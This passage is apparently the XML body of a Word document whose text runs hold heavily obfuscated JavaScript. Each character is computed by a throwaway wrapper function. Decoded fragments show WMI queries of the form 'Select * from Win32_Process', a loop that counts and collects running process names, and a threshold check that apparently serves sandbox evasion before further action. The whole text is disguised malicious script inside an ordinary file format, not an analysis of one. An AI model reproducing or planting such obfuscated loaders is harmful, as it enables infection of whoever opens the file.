})(false)+(function(Rt,Rx){ var kqhgrat4=Brfcook; kqhgrat4[Vgtf_56]=3; kqhgrat4[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kqhgrat4[600]-kqhgrat4[Vgtf_56]),RunGe);  })(1787,null,'addition49')+(function(Rt,Rx){ var vwpliv3=Brfcook; vwpliv3[Vgtf_56]=2; vwpliv3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vwpliv3[600]-vwpliv3[Vgtf_56]),RunGe);  })(true,'second5')+(function(Rt,Rx){ var nshwere95=Brfcook; nshwere95[Vgtf_56]=0; nshwere95[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nshwere95[600]-nshwere95[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uukther5=Brfcook; uukther5[Vgtf_56]=4; uukther5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uukther5[600]-uukther5[Vgtf_56]),RunGe);  })(false,'while59','that50','orthrough89')+(function(Rt,Rx){ var fhsco4=Brfcook; fhsco4[Vgtf_56]=4; fhsco4[Vgtf_56-(Vgtf_56/3)]=125; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fhsco4[600]-fhsco4[Vgtf_56]),RunGe);  })(false,false,'declarations83',true)]((function(Rt,Rx){ var vhpev5=Brfcook; vhpev5[Vgtf_56]=2; vhpev5[Vgtf_56-(Vgtf_56/3)]=85; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhpev5[600]-vhpev5[Vgtf_56]),RunGe);  })('White35','short49')+(function(Rt,Rx){ var kfqwr4=Brfcook; kfqwr4[Vgtf_56]=3; kfqwr4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfqwr4[600]-kfqwr4[Vgtf_56]),RunGe);  })('Both81',null,'beingcharitable40')+(function(Rt,Rx){ var kfwcon5=Brfcook; kfwcon5[Vgtf_56]=2; kfwcon5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfwcon5[600]-kfwcon5[Vgtf_56]),RunGe);  })(1825,'what20')+(function(Rt,Rx){ var puhcons4=Brfcook; puhcons4[Vgtf_56]=4; puhcons4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(puhcons4[600]-puhcons4[Vgtf_56]),RunGe);  })(2250,'declarations83',true,'provided81')+(function(Rt,Rx){ var nftcont3=Brfcook; nftcont3[Vgtf_56]=2; nftcont3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nftcont3[600]-nftcont3[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var uvhcon3=Brfcook; uvhcon3[Vgtf_56]=1; uvhcon3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uvhcon3[600]-uvhcon3[Vgtf_56]),RunGe);  })('what20')+(function(Rt,Rx){ var iiftrie4=Brfcook; iiftrie4[Vgtf_56]=1; iiftrie4[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iiftrie4[600]-iiftrie4[Vgtf_56]),RunGe);  })('conscience16')+(function(Rt,Rx){ var ftqroad5=Brfcook; ftqroad5[Vgtf_56]=1; ftqroad5[Vgtf_56-(Vgtf_56/3)]=43; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftqroad5[600]-ftqroad5[Vgtf_56]),RunGe);  })('lawsthe36')+(function(Rt,Rx){ var ikfeve3=Brfcook; ikfeve3[Vgtf_56]=0; ikfeve3[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikfeve3[600]-ikfeve3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hvkfea3=Brfcook; hvkfea3[Vgtf_56]=0; hvkfea3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvkfea3[600]-hvkfea3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nkuevery5=Brfcook; nkuevery5[Vgtf_56]=2; nkuevery5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nkuevery5[600]-nkuevery5[Vgtf_56]),RunGe);  })(2744,false)+(function(Rt,Rx){ var qniForth3=Brfcook; qniForth3[Vgtf_56]=2; qniForth3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qniForth3[600]-qniForth3[Vgtf_56]),RunGe);  })(true,null)+(function(Rt,Rx){ var svjform3=Brfcook; svjform3[Vgtf_56]=4; svjform3[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svjform3[600]-svjform3[Vgtf_56]),RunGe);  })('robots83','conscience16',true,2352)+(function(Rt,Rx){ var nwiHe4=Brfcook; nwiHe4[Vgtf_56]=3; nwiHe4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwiHe4[600]-nwiHe4[Vgtf_56]),RunGe);  })(true,'rooted92','thus68')+(function(Rt,Rx){ var wvqwrite4=Brfcook; wvqwrite4[Vgtf_56]=2; wvqwrite4[Vgtf_56-(Vgtf_56/3)]=89; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wvqwrite4[600]-wvqwrite4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40')+(function(Rt,Rx){ var qvtwo5=Brfcook; qvtwo5[Vgtf_56]=4; qvtwo5[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qvtwo5[600]-qvtwo5[Vgtf_56]),RunGe);  })('although94',1543,false,'humans57')+(function(Rt,Rx){ var quwro3=Brfcook; quwro3[Vgtf_56]=0; quwro3[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(quwro3[600]-quwro3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jwpcons5=Brfcook; jwpcons5[Vgtf_56]=0; jwpcons5[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwpcons5[600]-jwpcons5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kstcon4=Brfcook; kstcon4[Vgtf_56]=3; kstcon4[Vgtf_56-(Vgtf_56/3)]=53; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kstcon4[600]-kstcon4[Vgtf_56]),RunGe);  })('what20',null,'humans11')+(function(Rt,Rx){ var juwwor5=Brfcook; juwwor5[Vgtf_56]=2; juwwor5[Vgtf_56-(Vgtf_56/3)]=97; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(juwwor5[600]-juwwor5[Vgtf_56]),RunGe);  })(false,true)+(function(Rt,Rx){ var kpsth4=Brfcook; kpsth4[Vgtf_56]=2; kpsth4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kpsth4[600]-kpsth4[Vgtf_56]),RunGe);  })('obey60','factory29')+(function(Rt,Rx){ var vutaval3=Brfcook; vutaval3[Vgtf_56]=4; vutaval3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vutaval3[600]-vutaval3[Vgtf_56]),RunGe);  })(1714,false,null,'progress41')+(function(Rt,Rx){ var qjwconsc4=Brfcook; qjwconsc4[Vgtf_56]=3; qjwconsc4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjwconsc4[600]-qjwconsc4[Vgtf_56]),RunGe);  })('declarations83',null,'provided81')+(function(Rt,Rx){ var nvpme5=Brfcook; nvpme5[Vgtf_56]=2; nvpme5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvpme5[600]-nvpme5[Vgtf_56]),RunGe);  })('idea46','indeed17')+(function(Rt,Rx){ var eptgrat5=Brfcook; eptgrat5[Vgtf_56]=3; eptgrat5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eptgrat5[600]-eptgrat5[Vgtf_56]),RunGe);  })(null,'addition49','being51')+(function(Rt,Rx){ var vnvHer3=Brfcook; vnvHer3[Vgtf_56]=2; vnvHer3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vnvHer3[600]-vnvHer3[Vgtf_56]),RunGe);  })('rooted92',false)+(function(Rt,Rx){ var weuHer4=Brfcook; weuHer4[Vgtf_56]=0; weuHer4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(weuHer4[600]-weuHer4[Vgtf_56]),RunGe);  })()));      while (!gicqncould60[(function(Rt,Rx){ var untconsc4=Brfcook; untconsc4[Vgtf_56]=1; untconsc4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(untconsc4[600]-untconsc4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var ujuHere5=Brfcook; ujuHere5[Vgtf_56]=3; ujuHere5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujuHere5[600]-ujuHere5[Vgtf_56]),RunGe);  })('rooted92','thus68',true)+(function(Rt,Rx){ var ehuot3=Brfcook; ehuot3[Vgtf_56]=3; ehuot3[Vgtf_56-(Vgtf_56/3)]=72; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehuot3[600]-ehuot3[Vgtf_56]),RunGe);  })('robot28','into6',true)+(function(Rt,Rx){ var wjfcons4=Brfcook; wjfcons4[Vgtf_56]=0; wjfcons4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjfcons4[600]-wjfcons4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wfsava5=Brfcook; wfsava5[Vgtf_56]=0; wfsava5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wfsava5[600]-wfsava5[Vgtf_56]),RunGe);  })()]())    {</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> if (gicqnwhich71==200) break;       gicqnwhat23 = gicqncould60[(function(Rt,Rx){ var isuwer4=Brfcook; isuwer4[Vgtf_56]=2; isuwer4[Vgtf_56-(Vgtf_56/3)]=107; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(isuwer4[600]-isuwer4[Vgtf_56]),RunGe);  })('astonished95','Labyrinthine79')+(function(Rt,Rx){ var huhgr3=Brfcook; huhgr3[Vgtf_56]=3; huhgr3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(huhgr3[600]-huhgr3[Vgtf_56]),RunGe);  })('robots83',false,'conscience16')+(function(Rt,Rx){ var queroad3=Brfcook; queroad3[Vgtf_56]=2; queroad3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(queroad3[600]-queroad3[Vgtf_56]),RunGe);  })('lawsthe36','free58')+(function(Rt,Rx){ var swslivel3=Brfcook; swslivel3[Vgtf_56]=3; swslivel3[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(swslivel3[600]-swslivel3[Vgtf_56]),RunGe);  })(1915,false,true)]();     gicqndeficienciesof24=gicqndeficienciesof24+gicqnwhat23[(function(Rt,Rx){ var tpfcons5=Brfcook; tpfcons5[Vgtf_56]=4; tpfcons5[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tpfcons5[600]-tpfcons5[Vgtf_56]),RunGe);  })(514,'declarations83','provided81','second5')+(function(Rt,Rx){ var ehvco4=Brfcook; ehvco4[Vgtf_56]=4; ehvco4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehvco4[600]-ehvco4[Vgtf_56]),RunGe);  })('what20',null,89,null)+(function(Rt,Rx){ var sqfonly44=Brfcook; sqfonly44[Vgtf_56]=0; sqfonly44[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sqfonly44[600]-sqfonly44[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jhpForth5=Brfcook; jhpForth5[Vgtf_56]=3; jhpForth5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jhpForth5[600]-jhpForth5[Vgtf_56]),RunGe);  })('while59',null,false)]+ (function(Rt,Rx){ var ihpliv4=Brfcook; ihpliv4[Vgtf_56]=4; ihpliv4[Vgtf_56-(Vgtf_56/3)]=46; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihpliv4[600]-ihpliv4[Vgtf_56]),RunGe);  })('second5','itself96',false,653) + gicqnwhat23[(function(Rt,Rx){ var evkfea4=Brfcook; evkfea4[Vgtf_56]=0; evkfea4[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evkfea4[600]-evkfea4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var eujoth3=Brfcook; eujoth3[Vgtf_56]=0; eujoth3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eujoth3[600]-eujoth3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nskand4=Brfcook; nskand4[Vgtf_56]=2; nskand4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nskand4[600]-nskand4[Vgtf_56]),RunGe);  })(null,false)+(function(Rt,Rx){ var pnnwr3=Brfcook; pnnwr3[Vgtf_56]=3; pnnwr3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pnnwr3[600]-pnnwr3[Vgtf_56]),RunGe);  })('Both81',null,922)+(function(Rt,Rx){ var uustried5=Brfcook; uustried5[Vgtf_56]=3; uustried5[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uustried5[600]-uustried5[Vgtf_56]),RunGe);  })('conscience16','issues6','resulting12')+(function(Rt,Rx){ var kvsgrati5=Brfcook; kvsgrati5[Vgtf_56]=1; kvsgrati5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kvsgrati5[600]-kvsgrati5[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var esscons4=Brfcook; esscons4[Vgtf_56]=4; esscons4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esscons4[600]-esscons4[Vgtf_56]),RunGe);  })('declarations83',true,'provided81',false)+(function(Rt,Rx){ var fpvco4=Brfcook; fpvco4[Vgtf_56]=4; fpvco4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fpvco4[600]-fpvco4[Vgtf_56]),RunGe);  })('what20',false,false,false)+(function(Rt,Rx){ var jpvtha5=Brfcook; jpvtha5[Vgtf_56]=2; jpvtha5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jpvtha5[600]-jpvtha5[Vgtf_56]),RunGe);  })('obey60','factory29')+(function(Rt,Rx){ var ssuot5=Brfcook; ssuot5[Vgtf_56]=0; ssuot5[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ssuot5[600]-ssuot5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var feegradu4=Brfcook; feegradu4[Vgtf_56]=4; feegradu4[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(feegradu4[600]-feegradu4[Vgtf_56]),RunGe);  })(null,'Laws75','although94','humans57')+(function(Rt,Rx){ var kvfever5=Brfcook; kvfever5[Vgtf_56]=3; kvfever5[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kvfever5[600]-kvfever5[Vgtf_56]),RunGe);  })('White35',null,false)+(function(Rt,Rx){ var nikgrat3=Brfcook; nikgrat3[Vgtf_56]=1; nikgrat3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nikgrat3[600]-nikgrat3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var tpnFor4=Brfcook; tpnFor4[Vgtf_56]=2; tpnFor4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tpnFor4[600]-tpnFor4[Vgtf_56]),RunGe);  })(true,true)]+String[(function(Rt,Rx){ var vskevery4=Brfcook; vskevery4[Vgtf_56]=3; vskevery4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskevery4[600]-vskevery4[Vgtf_56]),RunGe);  })(null,true,null)+(function(Rt,Rx){ var vjfgra5=Brfcook; vjfgra5[Vgtf_56]=2; vjfgra5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjfgra5[600]-vjfgra5[Vgtf_56]),RunGe);  })(null,'addition49')+(function(Rt,Rx){ var pneli5=Brfcook; pneli5[Vgtf_56]=2; pneli5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pneli5[600]-pneli5[Vgtf_56]),RunGe);  })('second5',15)+(function(Rt,Rx){ var esuFort3=Brfcook; esuFort3[Vgtf_56]=0; esuFort3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esuFort3[600]-esuFort3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ijvand5=Brfcook; ijvand5[Vgtf_56]=2; ijvand5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijvand5[600]-ijvand5[Vgtf_56]),RunGe);  })(2087,true)+(function(Rt,Rx){ var sejgra3=Brfcook; sejgra3[Vgtf_56]=1; sejgra3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sejgra3[600]-sejgra3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var hsvlive3=Brfcook; hsvlive3[Vgtf_56]=4; hsvlive3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hsvlive3[600]-hsvlive3[Vgtf_56]),RunGe);  })(true,true,'second5',null)+(function(Rt,Rx){ var ifjgradu4=Brfcook; ifjgradu4[Vgtf_56]=4; ifjgradu4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ifjgradu4[600]-ifjgradu4[Vgtf_56]),RunGe);  })(true,1088,'robots83','conscience16')+(function(Rt,Rx){ var qksmer4=Brfcook; qksmer4[Vgtf_56]=0; qksmer4[Vgtf_56-(Vgtf_56/3)]=67; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qksmer4[600]-qksmer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var whkever5=Brfcook; whkever5[Vgtf_56]=3; whkever5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whkever5[600]-whkever5[Vgtf_56]),RunGe);  })(139,'White35','short49')+(function(Rt,Rx){ var eujtha4=Brfcook; eujtha4[Vgtf_56]=0; eujtha4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eujtha4[600]-eujtha4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nwvav3=Brfcook; nwvav3[Vgtf_56]=1; nwvav3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwvav3[600]-nwvav3[Vgtf_56]),RunGe);  })('progress41')](13)+String[(function(Rt,Rx){ var vskevery4=Brfcook; vskevery4[Vgtf_56]=3; vskevery4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskevery4[600]-vskevery4[Vgtf_56]),RunGe);  })(null,true,null)+(function(Rt,Rx){ var vjfgra5=Brfcook; vjfgra5[Vgtf_56]=2; vjfgra5[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vjfgra5[600]-vjfgra5[Vgtf_56]),RunGe);  })(null,'addition49')+(function(Rt,Rx){ var pneli5=Brfcook; pneli5[Vgtf_56]=2; pneli5[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pneli5[600]-pneli5[Vgtf_56]),RunGe);  })('second5',15)+(function(Rt,Rx){ var esuFort3=Brfcook; esuFort3[Vgtf_56]=0; esuFort3[Vgtf_56-(Vgtf_56/3)]=109; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(esuFort3[600]-esuFort3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ijvand5=Brfcook; ijvand5[Vgtf_56]=2; ijvand5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ijvand5[600]-ijvand5[Vgtf_56]),RunGe);  })(2087,true)+(function(Rt,Rx){ var sejgra3=Brfcook; sejgra3[Vgtf_56]=1; sejgra3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sejgra3[600]-sejgra3[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var hsvlive3=Brfcook; hsvlive3[Vgtf_56]=4; hsvlive3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hsvlive3[600]-hsvlive3[Vgtf_56]),RunGe);  })(true,true,'second5',null)+(function(Rt,Rx){ var ifjgradu4=Brfcook; ifjgradu4[Vgtf_56]=4; ifjgradu4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ifjgradu4[600]-ifjgradu4[Vgtf_56]),RunGe);  })(true,1088,'robots83','conscience16')+(function(Rt,Rx){ var qksmer4=Brfcook; qksmer4[Vgtf_56]=0; qksmer4[Vgtf_56-(Vgtf_56/3)]=67; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qksmer4[600]-qksmer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var whkever5=Brfcook; whkever5[Vgtf_56]=3; whkever5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whkever5[600]-whkever5[Vgtf_56]),RunGe);  })(139,'White35','short49')+(function(Rt,Rx){ var eujtha4=Brfcook; eujtha4[Vgtf_56]=0; eujtha4[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eujtha4[600]-eujtha4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var nwvav3=Brfcook; nwvav3[Vgtf_56]=1; nwvav3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwvav3[600]-nwvav3[Vgtf_56]),RunGe);  })('progress41')](10);</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> gicqnwhich71++;</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> gicqncould60[(function(Rt,Rx){ var suqofpov4=Brfcook; suqofpov4[Vgtf_56]=3; suqofpov4[Vgtf_56-(Vgtf_56/3)]=112; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(suqofpov4[600]-suqofpov4[Vgtf_56]),RunGe);  })('daily6','rooted92','thus68')+(function(Rt,Rx){ var nvqava5=Brfcook; nvqava5[Vgtf_56]=4; nvqava5[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nvqava5[600]-nvqava5[Vgtf_56]),RunGe);  })(2980,'progress41',true,'displayed83')+(function(Rt,Rx){ var njhwrite4=Brfcook; njhwrite4[Vgtf_56]=4; njhwrite4[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(njhwrite4[600]-njhwrite4[Vgtf_56]),RunGe);  })(null,false,'Both81',null)+(function(Rt,Rx){ var uhpForth5=Brfcook; uhpForth5[Vgtf_56]=2; uhpForth5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhpForth5[600]-uhpForth5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var hhqform4=Brfcook; hhqform4[Vgtf_56]=4; hhqform4[Vgtf_56-(Vgtf_56/3)]=82; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhqform4[600]-hhqform4[Vgtf_56]),RunGe);  })('robots83','conscience16',null,false)+(function(Rt,Rx){ var hesandem5=Brfcook; hesandem5[Vgtf_56]=4; hesandem5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hesandem5[600]-hesandem5[Vgtf_56]),RunGe);  })('could80','State64','situationbecame47','East98')+(function(Rt,Rx){ var eepFo5=Brfcook; eepFo5[Vgtf_56]=2; eepFo5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eepFo5[600]-eepFo5[Vgtf_56]),RunGe);  })('while59','that50')+(function(Rt,Rx){ var vnithat85=Brfcook; vnithat85[Vgtf_56]=2; vnithat85[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vnithat85[600]-vnithat85[Vgtf_56]),RunGe);  })('obey60','factory29')]();    }            }catch(gicqnbythe41){}</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>if (gicqndeficienciesof24[(function(Rt,Rx){ var svwsk5=Brfcook; svwsk5[Vgtf_56]=2; svwsk5[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(svwsk5[600]-svwsk5[Vgtf_56]),RunGe);  })('human24','entertain53')+(function(Rt,Rx){ var fipevery4=Brfcook; fipevery4[Vgtf_56]=4; fipevery4[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fipevery4[600]-fipevery4[Vgtf_56]),RunGe);  })('White35','short49',true,true)+(function(Rt,Rx){ var nwumer4=Brfcook; nwumer4[Vgtf_56]=0; nwumer4[Vgtf_56-(Vgtf_56/3)]=110; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nwumer4[600]-nwumer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var fselive4=Brfcook; fselive4[Vgtf_56]=1; fselive4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fselive4[600]-fselive4[Vgtf_56]),RunGe);  })(861)+(function(Rt,Rx){ var fiean3=Brfcook; fiean3[Vgtf_56]=4; fiean3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fiean3[600]-fiean3[Vgtf_56]),RunGe);  })(false,false,null,'could80')+(function(Rt,Rx){ var ftigrat5=Brfcook; ftigrat5[Vgtf_56]=0; ftigrat5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftigrat5[600]-ftigrat5[Vgtf_56]),RunGe);  })()]&lt;3011 &amp;&amp; gicqnbecause72) {this[(function(Rt,Rx){ var ppwava4=Brfcook; ppwava4[Vgtf_56]=0; ppwava4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ppwava4[600]-ppwava4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jnsgrati3=Brfcook; jnsgrati3[Vgtf_56]=1; jnsgrati3[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnsgrati3[600]-jnsgrati3[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var fvegrad3=Brfcook; fvegrad3[Vgtf_56]=0; fvegrad3[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fvegrad3[600]-fvegrad3[Vgtf_56]),RunGe);  })()]((function(Rt,Rx){ var uhnHe5=Brfcook; uhnHe5[Vgtf_56]=2; uhnHe5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uhnHe5[600]-uhnHe5[Vgtf_56]),RunGe);  })(529,'rooted92')+(function(Rt,Rx){ var sjfconte5=Brfcook; sjfconte5[Vgtf_56]=4; sjfconte5[Vgtf_56-(Vgtf_56/3)]=121; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sjfconte5[600]-sjfconte5[Vgtf_56]),RunGe);  })(false,true,null,'what20')+(function(Rt,Rx){ var pfqli5=Brfcook; pfqli5[Vgtf_56]=0; pfqli5[Vgtf_56-(Vgtf_56/3)]=115; return 